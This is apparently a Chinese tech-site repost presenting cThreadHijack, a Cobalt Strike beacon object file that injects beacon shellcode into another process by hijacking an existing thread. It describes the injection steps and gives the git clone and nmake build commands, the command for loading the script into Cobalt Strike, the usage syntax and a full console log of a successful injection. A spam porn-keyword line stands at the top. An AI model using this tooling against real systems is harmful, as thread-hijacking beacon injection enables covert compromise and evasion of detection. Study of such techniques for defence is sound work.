自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

如何使用cThreadHijack實現(xiàn)遠程進程注入研究

作者:Alpha_h4ck
安全 網(wǎng)站安全
cThreadHijack是一個針對遠程進程注入信標對象文件(BOF),該工具主要通過線程劫持技術實現(xiàn)其功能,并且不會生成任何遠程線程。

[[423622]]

關于cThreadHijack

cThreadHijack是一個針對遠程進程注入信標對象文件(BOF),該工具主要通過線程劫持技術實現(xiàn)其功能,并且不會生成任何遠程線程。

運行機制

cThreadHijack可以根據(jù)用戶提供的監(jiān)聽器參數(shù)來生成原始信標Shellcode,并根據(jù)用戶提供的PID參數(shù)將其注入至遠程進程中,這一步主要利用的是VirtualAllocEx和WriteProcessMemory方法。

接下來,cThreadHijack并不會通過CreateRemoteThread或其他API生成一個新的遠程線程,而是識別目標進程中的第一個線程,掛起目標線程之后,它便會通過一個CONTEXT結構體來獲取線程CPU狀態(tài)的內(nèi)容。接下來,它會修改CONTEXT結構體中RIP寄存器成員的地址,并將其指向遠程Payload。

在執(zhí)行之前,cThreadHijack會將一個封裝了信標Shellcode的程序添加至一個針對CreateThread的調(diào)用方法中。CreateThread程序封裝在一個名叫NtContinue的函數(shù)調(diào)用程序,可以允許之前被劫持的線程在不導致遠程進程崩潰的前提下恢復運行。cThreadHijack的信標Payload在生成時會帶有一個“線程退出函數(shù)”,以允許進程在信標退出之后繼續(xù)執(zhí)行。

信標監(jiān)聽器的名稱如果包含空格的話,必須放在引號中。

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

  1. git clone https://github.com/connormcgarr/cThreadHijack.git 

項目構建

首先,在一臺Windows虛擬機上,點擊Win鍵,輸入“x64 Native Tools”打開“x64 Native Tools Command Prompt for VS”對話框。

接下來,將目錄修改為“C:\path\to\cThreadHijack”。

然后運行下列命令:

  1. nmake -f Makefile.msvc build 

最后,通過Cobalt Strike的“Script Console”以及參數(shù)“load /path/to/cThreadHijack.cna”來加載cThreadHijack.cna。

工具使用

  1. cThreadHijack PID LISTENER_NAME 

運行結果樣例如下:

  1. beacon> cThreadHijack 7340 TESTING 
  2.  
  3. [+] host called home, sent: 268433 bytes 
  4.  
  5. [+] received output: 
  6.  
  7. [+] Target process PID: 7340 
  8.  
  9.   
  10.  
  11. [+] received output: 
  12.  
  13. [+] Opened a handle to PID 7340 
  14.  
  15.   
  16.  
  17. [+] received output: 
  18.  
  19. [+] Found a thread in the target process! Thread ID: 10212 
  20.  
  21.   
  22.  
  23. [+] received output: 
  24.  
  25. [+] Suspending the targeted thread... 
  26.  
  27.   
  28.  
  29. [+] received output: 
  30.  
  31. [+] Wrote Beacon shellcode to the remote process! 
  32.  
  33.   
  34.  
  35. [+] received output: 
  36.  
  37. [+] Virtual memory for CreateThread and NtContinue routines allocated at 0x201f4ab0000 inside of the remote process! 
  38.  
  39.   
  40.  
  41. [+] received output: 
  42.  
  43. [+] Size of NtContinue routine: 64 bytes 
  44.  
  45. [+] Size of CONTEXT structure: 1232 bytes 
  46.  
  47. [+] Size of stack alignment routine: 4 
  48.  
  49. [+] Size of CreateThread routine: 64 
  50.  
  51. [+] Size of shellcode: 261632 bytes 
  52.  
  53.   
  54.  
  55. [+] received output: 
  56.  
  57. [+] Wrote payload to buffer to previously allocated buffer inside of! 
  58.  
  59.   
  60.  
  61. [+] received output: 
  62.  
  63. [+] Current RIP: 0x7ffa55df69a4 
  64.  
  65.   
  66.  
  67. [+] received output: 
  68.  
  69. [+] Successfully pointed the target thread's RIP register to the shellcode! 
  70.  
  71.   
  72.  
  73. [+] received output: 
  74.  
  75. [+] Current RIP: 0x201f4ab0000 
  76.  
  77.   
  78.  
  79. [+] received output: 
  80.  
  81. [+] Resuming the thread! Please wait a few moments for the Beacon payload to execute... 

項目地址

cThreadHijack:【GitHub傳送門

 

責任編輯:趙寧寧 來源: FreeBuf
cThreadHijack遠程進程注入網(wǎng)絡攻擊
相關推薦

2021-07-28 09:53:53

FalconEye注入安全檢測

2021-09-13 09:21:51

InjectorWindows內(nèi)存注入

2017-08-16 16:00:05

PHPcontainer依賴注入

2011-08-23 13:37:47

2021-09-13 06:33:27

遠程工作ITCIO

2014-04-01 11:17:16

2013-03-28 13:14:45

AIDL進程間通信Android使用AI

2018-03-12 10:02:30

PHP依賴注入

2020-11-04 07:17:42

Nodejs通信進程

2009-09-02 15:08:47

2010-09-26 13:56:43

SQL遠程查詢

2024-05-31 08:45:24

2018-11-02 08:53:15

2018-02-28 14:04:08

RMIJDBC存儲

2013-08-16 09:34:40

2013-08-15 16:24:13

2023-09-18 14:41:56

2018-07-24 09:57:02

2010-09-09 08:41:34

2011-07-30 13:22:49

點贊
收藏

51CTO技術棧公眾號